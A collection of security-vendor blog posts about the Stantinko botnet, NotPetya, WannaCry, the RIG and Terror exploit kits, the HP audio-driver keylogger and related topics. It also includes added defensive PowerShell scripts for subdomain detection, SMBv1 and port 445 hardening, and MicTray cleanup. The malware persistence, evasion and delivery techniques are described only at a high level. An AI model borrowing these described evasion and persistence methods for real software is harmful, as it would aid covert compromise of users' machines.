The botnet has primarily been used to run a largescale adware operation. The malware installs the browser extensions Teddy Protection and The Safe Surfing, which appear to users to be legitimate apps that block malicious URLs. These apps are legitimate if downloaded via the Chrome Web Store, but they are not if they are installed by Stantinko. The Stantinko versions contain different code that is used for click fraud and ad injection.
ESET reports that additional plugins known to be installed by Stantinko malware include Brute-Force and Search Parser, which are used for Joomla/WordPress brute force attacks and to anonymously search for Joomla/WordPress sites. Remote Administrator is a fully functional back door, and Facebook Bot can generate fake likes, create new accounts, or add friends on Facebook, virtually undetected.
While click fraud is the primary goal of the attackers, Stantinko malware can perform a wide range of functions, since it includes a loader that enables threat actors to send any code to an infected device via their C2 server and run it.
ESET researchers say the malware uses Windows services to perform backdoor activities and brute force attacks on WordPress and Joomla websites. Once access is gained, the attackers sell on the login credentials to other cybercriminal groups, according to ESET. That’s not all. ESET says Stantinko malware could be used to perform any task on an infected host.
The malware and botnet have remained undetected for so long due to their ability to adapt to avoid being detected by anti-malware solutions. The malware also uses code encryption to avoid detection. Users would be unlikely to realize that anything untoward was happening on their machine. The tasks performed by the malware involve low CPU activity and do not slow an infected device considerably.
Infection is believed to occur through illegal file sharing, especially the downloading of pirated software. ESET notes that infection has occurred through fake torrent files that are actually executables.
Removal of the malware is not straightforward. The malware installs two Windows services, each of which is capable of reinstalling the other service if one is deleted. If for any reason that process fails, the attackers can reinstall those services via their C2 server.
The discovery of Stantinko malware highlights the danger of failing to prevent employees from accessing file sharing websites at work. The downloading of pirated material, even accessing torrent files, has the potential to infect enterprise networks with malware. Even if anti-virus and anti-malware solutions have been deployed, there is no guarantee that malware will be detected.
Organizations can protect against these types of attacks by implementing a web filtering solution and blocking access to file sharing websites and torrent sites. If these sites cannot be accessed and pirated software downloads are blocked, infection can be prevented.
UK porn filtering controls are expected to be introduced next year to make it harder for minors to access – accidentally or deliberately – pornographic material over the Internet. The government has proposed a new requirement that will make it mandatory for all sites hosting adult or pornographic content to conduct age verification checks before adult content is displayed.
From April next year, a yet to be decided regulator – most likely the British Board of Film Classification – will be able to block websites hosting pornography if they do not conduct checks to ensure visitors are over the age of 18. Blocks are likely to be applied at the ISP level and the sites could be barred from taking credit card payments from the UK if they do not comply.
The change to UK porn filtering controls would mean minors would be prevented from accessing pornographic material. Digital minister, Matt Hancock, explained the move would mean “UK will have the most robust internet child protection measures of any country in the world.”
While many adult websites ask the user if they are over 18 before content is displayed to prevent accidental access, further controls would be required to verify age. One of the easiest ways to do that is by forcing the visitor to submit their credit card details. In the UK, it is not possible for individuals under the age of 18 to be issued with a credit card.
The new UK porn filtering controls have been welcomed by some groups – the National Society for the Prevention of Cruelty to Children (NSPCC) for example – but the move has raised many concerns.
Age verification checks are likely to result in the operators of the websites maintaining a database of site users, even individuals who do not pay for access. The database is likely not only to include details supplied in the verification checks, but include profiling and viewing histories. It is possible that large volumes of highly sensitive data could be collected on millions of users.
Any website that collects sensitive consumer data is a target for hackers. The databases that could be built by adult content providers would be an even bigger target. Not only could information be used for fraud, the data could be used for blackmail and extortion. One only needs to look back to the Ashley Madison data breach in 2015 to see the damage that can be caused when the databases of adult websites are hacked.
That breach resulted in personal information being exposed along with details of sexual preferences and other highly sensitive information. The fact that a user was registered on a website that is used to hook up for extramarital affairs made the exposure of personal information even worse. The stolen information was subsequently used by criminals to blackmail users and led to many public shaming incidents. In some cases, exposed users of the site committed suicide as a direct result of the breach.
The Open Rights Group has spoken out about the proposed changes to UK porn filtering controls. Jim Killock, director of the Open Rights Group, said “The Government has repeatedly refused to ensure that there is a legal duty for age verification providers to protect the privacy of web users.” Now, the change “could lead to porn companies building databases of the UK’s porn habits, which could be vulnerable to Ashley Madison style hacks.”
Killock also pointed out, “There is also nothing to ensure a free and fair market for age verification. We are concerned that the porn company MindGeek will become the Facebook of age verification, dominating the UK market.” Were that to happen, the company would be able to decide the level of profiling that takes place, the level of controls it sees fit to introduce to protect data and what privacy risks UK citizens would face.
An enterprise email archiving solution allows emails to be retrieved on demand and ensures messages remain usable. Emails must be produced in the event of an audit and during the legal discovery process. Federal laws require organizations to produce emails, such as when a request is made under the Freedom of Information Act. An email archive is searchable and allows emails to be quickly and easily located and accessed when needed.
Since recovering emails from backups is a long and complicated process, many companies now use an enterprise email archiving solution such as ArcTitan. ArcTitan makes archiving emails a quick and easy process, freeing up valuable storage space on mail servers. Recovering emails is also rapid and straightforward as the archive is searchable. Even large numbers of emails from multiple email accounts can be recovered in minutes. Recovering multiple emails from backups can take several days.
Even though federal laws require emails to be produced on demand, many companies have yet to switch to an email archive and the IRS is not setting a good example. The IRS has recently been discovered to have failed to comply with federal regulations on email storage.
The Treasury Inspector General for Tax Administration (TIGTA) recently conducted an audit of the Internal Revenue Service and discovered that IRS policies on email storage do not allow it to consistently ensure records are retained, and that in several cases, the IRS has been unable to produce emails on request.
The audit was requested by the Chairman of the Senate Committee on Finance and the Chairman of the House Committee on Ways and Means after the IRS reported that it was unable to produce some documents after receiving Freedom of Information requests. After searching for the documents, the IRS discovered documents had been accidentally deleted.
The auditors determined that emails are not automatically archived for all employees and some employees had been instructed to manually store emails on their hard drives or network drives. As a result, some emails and documents were permanently lost when hard drives were damaged or destroyed.
The audit also showed that even though a new executive e-mail retention policy had been introduced that should have resulted in emails being automatically archived, that failed to happen as some executives did not turn on the automatic archiving feature.
Policies on email archiving were also not applied consistently. The IRS was discovered to have failed to follow its own policies on email archiving in more than half of the 30 Freedom of Information requests assessed by auditors. Had an enterprise email archiving solution been used, all documents and emails would have been recoverable and could have been quickly located.
TIGTA made five recommendations, including the implementation of an enterprise email archiving solution – which is something that all organizations in the United States should consider. In the event of an audit, Freedom of Information request or lawsuit, all relevant emails can be quickly produced and regulatory fines can be avoided.
An Enterprise Archiving Solution will Help IRS’ Compliance with GDPR
The implementation of an enterprise email archiving solution will also help IRS’ compliance with the EU’s General Data Protection Regulation (GDPR), due to be introduced in May 2018. Under the Regulation, the IRS (and any other US organization maintaining the personal data of EU citizens) has a duty to protect EU citizens’ personal data from loss, theft or unauthorized disclosure.
EU citizens also have the right to request access to personal data held by the IRS and a “right to be forgotten” if the IRS no longer has any lawful basis for retaining the data. TIGTA’s audit of email practices within the IRS could not have been more timely, as – should the IRS be unable to produce an email on request or fail to respond to a data access request within thirty days – the Service could be liable for a fine of up to 4% of global turnover. The IRS collected $3.3 trillion in taxes in 2015.
The NotPetya ransomware attacks on Tuesday this week initially looked like another WannaCry-style attack. They used similar NSA exploits to spread infections, ransoms were demanded and like WannaCry, the attacks rapidly spread around the globe. However, closer inspection of NotPetya ransomware has revealed that all may not be as it first appeared.
The purpose of ransomware is to lock files with powerful encryption to prevent files from being accessed. A ransom demand is then issued. Payment of the ransom will see the keys to unlock the decryption supplied. Organizations get their files back. The attackers get a big payday.
There have been many cases when ransomware has encrypted files, yet the attackers are not capable of supplying the keys. These attacks have tended to be conducted by amateurs or show the authors have been sloppy and failed to check that decryption is possible.
If attackers do not make good on their promise to supply valid keys to unlock the encryption, word will soon spread on social media and security websites that paying the ransom will not enable organizations to recover their files. That means the campaign will likely not be profitable.
Developing a new ransomware variant is not a quick and easy process. It does not make sense for a threat actor to go to all the trouble of developing ransomware, devising a sophisticated multi-vector campaign to spread the ransomware, but then forget about essential elements that make it possible to receive ransom payments. That is, unless the aim of the campaign is not to make money.
In the case of the recent NotPetya ransomware attacks, the actors behind the campaign appear to have made some serious errors if making money was their aim.
First, the ransom demand was only $300 per infected machine, which is well below the current average payment demanded by ransomware gangs.
As for the errors, they were numerous. Petya ransomware, which NotPetya closely resembles, provides the victim with an installation ID. That ID is unique to the victim. It is used to determine who has paid the ransom. In the latest attacks, the IDs consisted entirely of random characters. As Kaspersky Lab explained, that means it is not possible for the attackers to identify the victims that pay up.
Successful ransomware campaigns use a different Bitcoin address for each victim, yet only one Bitcoin account was used by the attackers. The email address used by the attacker was hosted by Posteo. The German firm quickly shut down that account, meaning it was not possible to check who had paid. That would be a serious oversight by the attackers, who surely must have suspected that would occur.
NotPetya ransomware also does not encrypt files. Like Petya, it replaces and encrypts the Master File Table (MFT). However, NotPetya ransomware corrupts the MFT, wiping out the first 24 sector blocks. Petya ransomware did not do that; instead, it made modifications that could be reversed. As a result, NotPetya causes permanent damage, ensuring recovery is not possible.
These factors suggest that Petya was modified and turned into a wiper to cause permanent damage rather than make money. That would suggest this was a state-sponsored attack designed to cause major disruption. Due to the extent to which Ukraine was attacked, that country appears to be the main target. As for who was responsible for the attack… that has yet to be established. However, many people in Ukraine have strong suspicions.
Confidence in cyber response plans doesn’t appear to be lacking according to a new study conducted by Deloitte. However, that does not mean organizations are prepared for cyberattacks when they occur. The survey revealed that while confidence is high and IT professionals believe they are well prepared to deal with attacks, their cyber response plans may not be effective.
The only way to determine whether cyber response plans will function as planned is to conduct regular tests. If plans are not tested, organizations will not be able to determine with any degree of certainty whether their plans will be effective.
As the recent Ponemon Institute Cost of a Data Breach study confirmed, the ability to respond quickly to a data breach can reduce breach resolution costs considerably. For that to happen, a response plan must have been developed prior to the breach being experienced and that plan must be effective.
The Deloitte study revealed that 76% of business executives were confident that in the event of a cyberattack they would be able to respond quickly and implement their cyberattack response policies. Yet, the study also revealed that 82% of respondents had not tested their response plans in the past year. They had also not documented their plans with business stakeholders in the past year.
A lot can change in a year. New software solutions are implemented, configurations change as do personnel. Only regular testing will ensure that plans work and staff know their roles when an attack occurs.
Cyberattack simulations are a useful tool to determine how attack response plans will work in practice. Plans often look great on paper but fail when put into practice. Running simulations every 6 months will help to ensure that a fast and effective response to a cyberattack is possible. However, the survey showed that only 46% of respondents conduct simulations twice a year or more frequently.
A data breach can have dire consequences for a company. The study showed that many companies are most concerned about disruptions to business processes as a result of a cyberattack, although loss of trust and tarnishing of a brand should be of more concern. When a data breach is experienced, customers often choose to take their business elsewhere resulting in a considerable loss of revenue. A fast and efficient breach response can help restore faith in a brand and reduce the churn rate.
If you want to reduce the impact of a data breach and reduce costs, it is essential for cyber response plans to be developed and tested. With the volume of cyberattacks now occurring, it is highly probable that those plans will need to be implemented. By then it will be too late to determine whether they are effective. That could prove extremely costly.
Hackers have been phishing for domain credentials and using the logins to gain access to websites and create malicious subdomains – a process called domain shadowing – and using those subdomains as gates that redirect users to sites loaded with the RIG exploit kit.
The RIG exploit kit probes for vulnerabilities in web browsers and exploits flaws to download malware. Those malware downloads usually occur silently without the users’ knowledge. All that is required for infection is an out of date browser or plugin and for the victim to be directed to a website hosting the exploit kit. RIG has primarily been used to download banking Trojans and Cerber ransomware. While use of the exploit kit is nowhere near the level of Angler prior to its demise, the Rig exploit kit is now the leading EK used by cybercriminals and activity has increased sharply in recent months.
Cybercriminals have been generating traffic to the malicious subdomains using malvertising campaigns – malicious adverts sneaked onto third party ad networks. Those ads are then syndicated across a wide range of high traffic websites and redirect visitors to the malicious subdomains. Other techniques used to drive traffic to the sites include malicious Chrome popups and iframes inserted into compromised WordPress, Drupal and Joomla! websites.
Tens of thousands of subdomains have been created on legitimate websites that have been compromised by hackers. Cybercriminals are understood to have been obtaining login credentials to websites using malware.
The subdomains were mostly created on websites hosted by GoDaddy. The domain registrar has been working with RSA Security and independent security researchers to identify the compromised websites and take down the subdomains. In total, around 40,000 subdomains were taken down in May.
While this take down is certainly good news, it is unclear how much of an effect it will have on Rig EK operations as little is known about the RIG infrastructure and the total number of websites that have had malicious subdomains added. However, RSA Security says these takedowns have resulted in “a significant loss of capabilities to RIG operations”. RSA and GoDaddy are working to prevent cybercriminals from using domain shadowing and are monitoring for new subdomains that are created. It is unclear if sites purchased through other domain registrars have been targeted in a similar way.
Domain shadowing is a problem because content filters typically have problems identifying malicious subdomains on a genuine website. Since the subdomains only remain active for around 24 hours before being shut down, cybercriminals can avoid domain blacklisting.
However, content filters can prevent users from visiting known malicious websites and they offer protection against webpages hosting exploit kits. They can also be configured to block the downloading of specific file types.
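The 24-hour lifetime described above is itself a usable signal. As an added example that is not part of the original article, the following PowerShell function runs that heuristic over web-proxy or DNS log lines: it flags hostnames under a long-established domain that were first seen recently, lived for under a day, and then went quiet. The log format, the two-label registered-domain rule and the thresholds are assumptions.

```powershell
# Added example, not from the original article. Heuristic detection of
# shadowed subdomains in "<yyyy-MM-ddTHH:mm> <hostname>" log lines (a
# constructed format). Thresholds and the two-label domain rule are assumptions.

function Get-RegisteredDomain {
    param([string]$HostName)
    # Assumption: the registered domain is the last two labels. Production code
    # should consult the Public Suffix List (e.g. for example.co.uk).
    $labels = $HostName.ToLower().TrimEnd('.').Split('.')
    if ($labels.Count -le 2) { return ($labels -join '.') }
    return ($labels[-2..-1] -join '.')
}

function Find-ShadowedSubdomains {
    param(
        [string[]]$LogLines,
        [int]$MinParentAgeDays = 30,     # parent must predate the subdomain by this much
        [double]$MaxLifetimeHours = 24   # shadowed subdomains are rotated within ~24h
    )
    $hosts = @{}
    foreach ($line in $LogLines) {
        if ([string]::IsNullOrWhiteSpace($line)) { continue }
        $parts = $line.Trim() -split '\s+', 2
        $when  = [datetime]::ParseExact($parts[0], "yyyy-MM-dd'T'HH:mm",
                                        [cultureinfo]::InvariantCulture)
        $name  = $parts[1].ToLower()
        if (-not $hosts.ContainsKey($name)) {
            $hosts[$name] = @{ First = $when; Last = $when; Hits = 0 }
        }
        $h = $hosts[$name]
        if ($when -lt $h.First) { $h.First = $when }
        if ($when -gt $h.Last)  { $h.Last  = $when }
        $h.Hits++
    }
    if ($hosts.Count -eq 0) { return @() }

    # Newest timestamp in the log, used to tell "still active" from "gone quiet"
    $logEnd = [datetime]::MinValue
    foreach ($h in $hosts.Values) { if ($h.Last -gt $logEnd) { $logEnd = $h.Last } }

    # Earliest sighting of anything under each registered domain
    $parentFirst = @{}
    foreach ($name in $hosts.Keys) {
        $parent = Get-RegisteredDomain $name
        $first  = $hosts[$name].First
        if (-not $parentFirst.ContainsKey($parent) -or $first -lt $parentFirst[$parent]) {
            $parentFirst[$parent] = $first
        }
    }

    $suspects = @()
    foreach ($name in $hosts.Keys) {
        $parent = Get-RegisteredDomain $name
        if ($name -eq $parent) { continue }      # the apex itself, not a subdomain
        $h = $hosts[$name]
        $parentAge  = ($h.First - $parentFirst[$parent]).TotalDays
        $lifetime   = ($h.Last - $h.First).TotalHours
        $quietHours = ($logEnd - $h.Last).TotalHours
        # Established parent, short-lived subdomain that has since stopped appearing
        if ($parentAge -ge $MinParentAgeDays -and
            $lifetime -le $MaxLifetimeHours -and
            $quietHours -ge $MaxLifetimeHours) {
            $suspects += [pscustomobject]@{
                Host        = $name
                Parent      = $parent
                FirstSeen   = $h.First
                LifetimeHrs = [math]::Round($lifetime, 1)
                Hits        = $h.Hits
            }
        }
    }
    return $suspects
}

# Constructed sample: example.com has months of history, cdn.example.com is a
# long-lived subdomain, and k3x9q.example.com appeared for two and a half hours
# and never came back. Only the last one should be reported.
$sampleLog = @(
    '2017-03-01T09:00 www.example.com',
    '2017-04-10T12:00 cdn.example.com',
    '2017-04-20T08:00 k3x9q.example.com',
    '2017-04-20T10:30 k3x9q.example.com',
    '2017-04-30T12:00 cdn.example.com',
    '2017-05-01T09:00 www.example.com'
)
Find-ShadowedSubdomains -LogLines $sampleLog | Format-Table -AutoSize
```

Flagged hosts are candidates for a lookup against threat intelligence or for temporary blocking at the proxy, not proof of compromise; a newly launched legitimate subdomain that is used only briefly will look the same to this heuristic.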
Organizations are also strongly advised to ensure browsers and plugins are kept up to date, especially Java, Silverlight and Adobe Flash plugins. The RIG exploit kit most commonly leverages the CVE-2015-8651 vulnerability to download malware, although other common exploits include CVE-2016-0189, CVE-2015-2419, and CVE-2014-6332.
The Terror exploit kit is a relative newcomer to the EK scene, yet it is evolving rapidly. Since the demise of Angler, exploit kit activity has waned. However, the threat from new exploit kits such as Terror is growing.
Exploit kits probe for vulnerabilities in browsers or plugins. When an individual is directed to a website hosting an exploit kit, the EK searches for exploitable vulnerabilities. When exploitable vulnerabilities are discovered, the EK silently downloads malware or ransomware.
Exploit kits can be hosted on compromised websites or sites run by the attackers. Cybercriminals use a variety of techniques to get traffic to the sites. Links can be sent via spam email or via instant messaging services and social media sites. Malicious advertisements – termed malvertising – can be hosted on third party ad networks. Those ads are then served in sidebars on any number of legitimate, high traffic websites. Web redirects are also used to divert traffic to malicious sites hosting exploit kits.
If an individual with out-of-date plugins or an older browser version visits such a malicious site, and an exploit has been loaded into the kit for a vulnerability in that browser, a malicious payload can be silently downloaded onto the user’s device.
In recent months, spam email has become the main attack vector used by cybercriminals. However, exploit kit activity appears to be increasing with the Terror exploit kit fast evolving into a significant threat.
The Terror exploit kit used to use a ‘carpet-bombing’ approach, sending a wide range of exploits at the end user’s system in the hope that one would be effective. Such an approach is not particularly sophisticated.
However, Terror has now been updated and attacks can be tailored based on the user’s browser environment. Exploits that have a high probability of being successful are then delivered. The Terror exploit kit can now determine which exploits to drop based on the victim’s browser version, the plugins that have been installed, or patch level, according to the researchers who discovered the update.
Protecting against exploit kits requires browsers and plugins to be kept 100% up to date and vulnerability free, which can be a challenge for businesses. Additional security solutions on endpoints can help to prevent malware downloads, although many are unable to detect or block fileless malware.
One of the best security solutions to deploy is a web filter capable of scanning the URL to prevent end users from landing on websites that are known to host exploit kits. Web filters can also be configured to block malicious adverts.
By preventing users from visiting known malicious sites, the threat from exploit kits can be significantly reduced.
The version of WannaCry ransomware used in Friday’s attacks has been blocked, although new WannaCry ransomware variants have been detected.
U.S. Escapes WannaCry Relatively Unscathed
The total number of computers infected with WannaCry ransomware is now believed to be around 300,000, although the United States escaped relatively unscathed, according to the U.S. Department of Homeland Security (DHS).
While it is still unclear exactly how many U.S. organizations have been affected, fewer than 10 organizations have reported a WannaCry ransomware attack to DHS.
The ransomware attacks have now stopped, although organizations that have experienced an infection that has resulted in files being encrypted must recover those files from a backup, accept data loss, or pay the attackers for the decryption keys.
The attackers have so far made around $81,000 from their ransomware campaign, according to @actual_ransom. With a ransom payment of $300 per infected device, many payments have already been made; however, given the number of devices locked by the ransomware, most victims are not paying the attackers to unlock their files.
WannaCry ransomware encryptions were stopped when a security researcher (Malware Tech) from the UK discovered a kill switch while investigating the worm code. In an apparent effort to avoid running in a sandbox or virtual environment, a check was performed on a nonsense domain. If a connection to that domain was successful, the ransomware would exit. If connection to the unregistered domain failed, the ransomware would proceed and encrypt files. By registering that domain, Malware Tech stopped further encryptions.
WannaCry Victims Appear to Have Been Contacted by the Attackers
In an apparent effort to increase the profits from the campaign, the attackers have generated pop up messages on affected computers saying, “I have already sent decryption keys to many customers who had sent me the correct amounts of bitcoin, and I guarantee the decryptions for such honest customers.” While this message could indicate the attacker has access to infected computers, it is possible that the message was pre-programmed to appear.
Paying ransom demands only encourages attackers to conduct further attacks. Ransom payments can be used by the attackers to fund further ransomware campaigns. There is also no guarantee that the attackers will supply valid keys to unlock data, even if they say they will. The advice from the Federal Bureau of Investigation (FBI) is never to pay a ransom unless it is absolutely necessary.
New WannaCry Ransomware Variants Detected
While the version of WannaCry ransomware used in Friday’s attacks has been stopped, that is not the only version of the ransomware being used. New WannaCry ransomware variants have been identified.
A second version was identified by researcher Matt Suiche. This version also included a kill switch, but used a different domain. Suiche registered that second domain and prevented 10,000 infected machines from having files encrypted.
A third version of WannaCry ransomware was also identified by Kaspersky Lab, this one without the kill switch, although in that case the ransomware component had been corrupted and infected computers would not have had data encrypted.
The WannaCry attacks used the ETERNALBLUE exploit published by Shadow Brokers last month, which takes advantage of a vulnerability in Microsoft Server Message Block 1.0 (SMBv1). The threat from WannaCry may be temporarily over, although WannaCry is not the only threat that uses the ETERNALBLUE exploit and the DoublePulsar backdoor.
Researchers at Proofpoint have identified another threat that similarly uses the exploit to gain access to computers. In this case, the goal is not to encrypt files or even steal data. The attackers install Adylkuzz – a program that hogs computer resources and mines the cryptocurrency Monero.
How to Block the ETERNALBLUE Exploit
Other cybercriminals may also be using the ETERNALBLUE exploit and new WannaCry ransomware variants may be released without the kill switch. To block attacks, organizations should ensure that the MS17-010 patch is applied to plug the vulnerability. Older operating systems (Windows 8, Windows Server 2003, and Windows XP) can also be patched and protected against WannaCry ransomware attacks and other malware that use the ETERNALBLUE exploit. Any organization that has port 445 open should also ensure the port is closed, and if SMB must be used over the Internet, SMB should be used through an internal network via a VPN.
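The checks above can be scripted. As an added example that is not part of the original article, the following PowerShell audits one Windows host for the three mitigations (MS17-010 installed, SMBv1 off, TCP/445 not reachable from the Internet) and optionally applies the last two; the KB list is a placeholder to be filled in from the MS17-010 bulletin for the host’s OS version.

```powershell
# Added example, not from the original article. Run in an elevated PowerShell
# session on Windows 8.1/Server 2012 R2 or later (NetSecurity and SmbShare modules).
# $Ms17010Kbs is a PLACEHOLDER: take the KB numbers for your OS from MS17-010.

function Test-Ms17010Exposure {
    param(
        [string[]]$Ms17010Kbs = @('KB-PLACEHOLDER')   # MS17-010 KB(s) for this OS
    )
    # Get-HotFix only lists updates the servicing stack recorded; on Windows 10 a
    # later cumulative update supersedes MS17-010, so treat "not found" as
    # "verify manually", not as "unpatched".
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    $patched   = @($Ms17010Kbs | Where-Object { $installed -contains $_ }).Count -gt 0

    # Server-side SMBv1 is the code path ETERNALBLUE exploits
    $smb1 = (Get-SmbServerConfiguration).EnableSMB1Protocol

    # Is there an enabled inbound firewall rule that blocks TCP/445?
    $blocks445 = @(
        Get-NetFirewallRule -Direction Inbound -Action Block -Enabled True |
            Where-Object {
                $pf = $_ | Get-NetFirewallPortFilter
                $pf.Protocol -eq 'TCP' -and
                    (@($pf.LocalPort) -contains '445' -or $pf.LocalPort -eq 'Any')
            }
    ).Count -gt 0

    [pscustomobject]@{
        Ms17010HotfixFound = $patched
        Smb1Enabled        = $smb1
        Port445Blocked     = $blocks445
        Exposed            = ($smb1 -and -not $blocks445 -and -not $patched)
    }
}

function Disable-Smb1AndBlockPort445 {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    if ($PSCmdlet.ShouldProcess('SMB server', 'Disable SMBv1')) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    }
    # Block SMB from Internet addresses only, so file sharing keeps working on
    # the LAN and over the VPN the article recommends; use -RemoteAddress Any to
    # block it from everywhere.
    if ($PSCmdlet.ShouldProcess('Windows Firewall', 'Block inbound TCP/445 from Internet')) {
        New-NetFirewallRule -DisplayName 'Block inbound SMB (TCP 445) from Internet' `
            -Direction Inbound -Protocol TCP -LocalPort 445 `
            -RemoteAddress Internet -Action Block | Out-Null
    }
}

# Usage:
#   Test-Ms17010Exposure -Ms17010Kbs 'KB-PLACEHOLDER'
#   Disable-Smb1AndBlockPort445 -WhatIf   # preview, then run without -WhatIf
```

Disabling SMBv1 breaks access from clients that only speak SMBv1 (Windows XP, some printers and NAS devices), so inventory those before rolling the change out fleet-wide.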
Browsing the Internet can result in malware and spyware downloads, and malicious software can arrive via spam email, but a fresh-out-of-the-box laptop computer should be totally malware free. That is not always the case. A pre-installed keylogger on HP laptops has recently been identified by Swedish security firm Modzero.
Potentially unwanted programs can be found on many new devices. Some serve a purpose but pose a security threat. For instance, in 2014, Lenovo laptop computers were shipped with ‘malware’ already installed that made the devices vulnerable to man-in-the-middle attacks. The program was Superfish.
The pre-installed keylogger on HP laptops does not appear to be used for any malicious purposes, although there is considerable potential for the program to be abused. The spyware records all keystrokes on the laptops after a user logs in and stores that information on a local drive. In some situations, the keystrokes will be passed to an API on the laptop.
The keylogger was discovered in an audio driver package – Conexant HD Audio Driver Package 22.214.171.124 and earlier versions. The offending file is MicTray64.exe, located in the C:\windows\system32\ folder.
Each time a user logs in, the program is scheduled to run. The file monitors all keystrokes on the device in order to watch for special keystrokes. The program was developed by Conexant, the audio chip manufacturer. The program has been included on HP laptops since December 2015.
While the software itself does not exactly pose a threat, the way the program logs the keystrokes allows the recorded keystrokes to be easily accessed. The log file created by the software is stored in the public folder (C:\users\public\MicTray.log) and can therefore be accessed by anyone.
The file is overwritten each time a user logs in, but any keystrokes recorded during that session could be accessed by anyone with access to the device. Additionally, if the registry key with the filepath is missing or corrupted, the keystrokes will be passed to a local API called OutputDebugString.
Malware installed on the device could potentially allow the log file to be copied, and along with it, all keystrokes from the session. It would also be possible for keystrokes to be obtained in real-time.
The inclusion of the keylogger on HP laptops was an error according to HP. It was used as a debugging tool and should have been removed in the final version of the product.
HP has responded to the discovery by releasing a patch to fix the issue, which is available from the HP website or via Microsoft Update. All owners of HP laptops purchased since December 2015 should download the patch to mitigate the issue.
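Administrators with a fleet of HP machines can check for the issue before and after patching. As an added example that is neither HP’s nor Modzero’s code, the following PowerShell reports whether MicTray64.exe, its logon task and the public log file are present and who can read the log, and can disable the task and delete the log; the paths are the ones named above, while the task name is not given in the article, so the task is located by the binary it runs.

```powershell
# Added example, not HP's or Modzero's code. Paths are those reported for the
# Conexant MicTray keylogger; the logon task is found by the executable it runs.

$MicTrayExe = Join-Path $env:SystemRoot 'System32\MicTray64.exe'
$MicTrayLog = 'C:\Users\Public\MicTray.log'

function Get-MicTrayStatus {
    # Scheduled tasks whose action runs MicTray (any name, any folder)
    $tasks = @(Get-ScheduledTask | Where-Object {
        @($_.Actions | Where-Object { $_.Execute -match 'MicTray' }).Count -gt 0
    })
    $log = if (Test-Path $MicTrayLog) { Get-Item $MicTrayLog } else { $null }

    # Principals allowed to read the log. In C:\Users\Public that normally
    # includes every local user, which is the exposure Modzero reported.
    $readers = @()
    if ($log) {
        $readers = @((Get-Acl $MicTrayLog).Access |
            Where-Object { $_.AccessControlType -eq 'Allow' -and
                           $_.FileSystemRights -match 'Read|Modify|FullControl' } |
            ForEach-Object { $_.IdentityReference.Value })
    }

    [pscustomobject]@{
        ExecutablePresent = (Test-Path $MicTrayExe)
        LogonTasks        = @($tasks | ForEach-Object TaskName)
        LogPresent        = ($null -ne $log)
        LogSizeBytes      = if ($log) { $log.Length } else { 0 }
        LogLastWritten    = if ($log) { $log.LastWriteTime } else { $null }
        LogReadableBy     = $readers
        Tasks             = $tasks        # CIM objects, used by Disable-MicTrayLogging
    }
}

function Disable-MicTrayLogging {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    $status = Get-MicTrayStatus
    foreach ($task in $status.Tasks) {
        # Disabling the task also stops the audio hotkey handling MicTray provides;
        # HP's patched driver package remains the real fix.
        if ($PSCmdlet.ShouldProcess($task.TaskName, 'Disable MicTray logon task')) {
            $task | Disable-ScheduledTask | Out-Null
        }
    }
    if ($status.LogPresent -and $PSCmdlet.ShouldProcess($MicTrayLog, 'Delete keystroke log')) {
        Remove-Item $MicTrayLog -Force
    }
    Get-MicTrayStatus   # report the state after the changes
}

# Usage (elevated):
#   Get-MicTrayStatus
#   Disable-MicTrayLogging -WhatIf   # preview, then run without -WhatIf
```

Because the log is rewritten at every logon, a non-empty LogSizeBytes on a patched machine means the old driver is still running and the patch did not take.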
Models found to contain the pre-installed spyware include the following 28 models of HP laptops:
- HP EliteBook 820 G3 Notebook PC
- HP EliteBook 828 G3 Notebook PC
- HP EliteBook 840 G3 Notebook PC
- HP EliteBook 848 G3 Notebook PC
- HP EliteBook 850 G3 Notebook PC
- HP ProBook 640 G2 Notebook PC
- HP ProBook 650 G2 Notebook PC
- HP ProBook 645 G2 Notebook PC
- HP ProBook 655 G2 Notebook PC
- HP ProBook 450 G3 Notebook PC
- HP ProBook 430 G3 Notebook PC
- HP ProBook 440 G3 Notebook PC
- HP ProBook 446 G3 Notebook PC
- HP ProBook 470 G3 Notebook PC
- HP ProBook 455 G3 Notebook PC
- HP EliteBook 725 G3 Notebook PC
- HP EliteBook 745 G3 Notebook PC
- HP EliteBook 755 G3 Notebook PC
- HP EliteBook 1030 G1 Notebook PC
- HP ZBook 15u G3 Mobile Workstation
- HP Elite x2 1012 G1 Tablet
- HP Elite x2 1012 G1 with Travel Keyboard
- HP Elite x2 1012 G1 Advanced Keyboard
- HP EliteBook Folio 1040 G3 Notebook PC
- HP ZBook 17 G3 Mobile Workstation
- HP ZBook 15 G3 Mobile Workstation
- HP ZBook Studio G3 Mobile Workstation
- HP EliteBook Folio G1 Notebook PC
Pew Research has recently published the results of a study that set out to test cybersecurity awareness in America and find out more about the risks individuals are unwittingly taking when venturing online.
The study was conducted on 1,055 adult Americans, who were each asked 13 cybersecurity questions of varying difficulty. Questions included what HTTPS means, what two-factor authentication is, what private browsing means and the level of protection offered by insecure WiFi networks using a VPN. The study showed that cybersecurity awareness in America is poor and consumers are potentially taking major risks online.
While all 13 questions should have been answered correctly by ‘security aware’ individuals, only 1% were able to answer all questions correctly. A substantial majority of adult Americans that took the questionnaire were only able to answer two of the questions correctly. The median was 5 correct answers out of 13, the mean 5.5, and only 20% of participants were able to answer more than 8 questions correctly.
Three quarters of participants were able to identify the most secure password in a list and 73% of respondents were aware that the use of public WiFi networks carries a major risk and should not be used for sensitive activities such as online banking, even if the WiFi network required the use of a password.
However, cybersecurity awareness was much worse for all other areas tested by the survey. Just over half of respondents were able to correctly identify what a phishing attack involved, which is a particularly worrying result considering how widespread the use of phishing is.
Ransomware has been heavily reported in the press and attacks on businesses have soared, yet fewer than half of survey participants were able to correctly identify what ransomware is and only 46% knew that email was not encrypted by default.
Worryingly, only 33% of participants were aware that HTTPS meant traffic was encrypted, suggesting many are entering credit card information into unencrypted websites.
Only one in ten participants were able to correctly identify multi-factor authentication, with 71% thinking CAPTCHA was a form of multi-factor authentication rather than just a method of differentiating between a human web visitor and a bot.
The survey showed cybersecurity awareness improved with the level of education in all areas tested by the study. Younger participants (18-29) were also more likely to answer questions correctly than the older age groups.
The share of incorrect answers was relatively low, with many opting to answer the questions with ‘not sure.’ While the survey does not show that cybersecurity awareness is woefully inadequate, it does clearly indicate that when it comes to cybersecurity awareness, there is considerable room for improvement.
